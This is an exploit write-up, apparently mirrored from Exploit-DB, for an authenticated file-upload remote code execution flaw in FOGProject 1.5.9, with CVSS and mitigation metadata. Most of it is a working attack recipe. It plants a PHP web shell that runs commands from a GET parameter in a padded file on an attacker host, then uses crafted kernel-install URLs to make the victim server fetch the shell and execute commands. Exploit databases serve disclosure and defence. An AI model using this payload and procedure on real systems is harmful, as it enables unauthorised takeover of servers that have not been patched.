FOGProject 1.5.9 - File Upload RCE (Authenticated)

vendor:

FOGProject

by:

sml@lacashita.com

9.8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: FOGProject

Affected Version From: 1.5.9

Affected Version To: 1.5.9

Patch Exists: YES

Related CWE: N/A

CPE: a:fogproject:fogproject:1.5.9

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Debian 10

2021

FOGProject 1.5.9 – File Upload RCE (Authenticated)

FOGProject 1.5.9 is vulnerable to a remote code execution vulnerability. An attacker can create an empty 10Mb file, add their PHP code to the end of the file, make the file accessible through HTTP, encode the URL to get the file to base64, visit the vulnerable page, change the Kernel Name to myshell.php and click on Install, and then visit the malicious URL to execute arbitrary code.

Mitigation:

Upgrade to the latest version of FOGProject.

Source

Exploit-DB raw data:

# Exploit Title: FOGProject 1.5.9 - File Upload RCE (Authenticated)
# Date: 2021-04-28
# Exploit Author: sml@lacashita.com
# Vendor Homepage: https://fogproject.org
# Software Link: https://github.com/FOGProject/fogproject/archive/1.5.9.zip
# Tested on: Debian 10

On the Attacker Machine:

1) Create an empty 10Mb file.
dd if=/dev/zero of=myshell bs=10485760 count=1

2) Add your PHP code to the end of the file created in the step 1.
echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell

3) Put the file "myshell" accessible through HTTP.
$ cp myshell /var/www/html

4) Encode the URL to get "myshell" file to base64 (Replacing Attacker IP).
$ echo "http://ATTACKER_IP/myshell" | base64
aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=

5) Visit 
http://VICTIM_IP/fog/management/index.php?node=about&sub=kernel&file=<YOUR_MYSHELL_URL_HERE>=&arch=arm64
Example:
http://192.168.1.120/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=&arch=arm64

6) Appears a textbox, change the Kernel Name (bzImage32) to myshell.php 
and click on Install.

7) Visit http://VICTIM_IP/fog/service/ipxe/myshell.php?cmd=hostname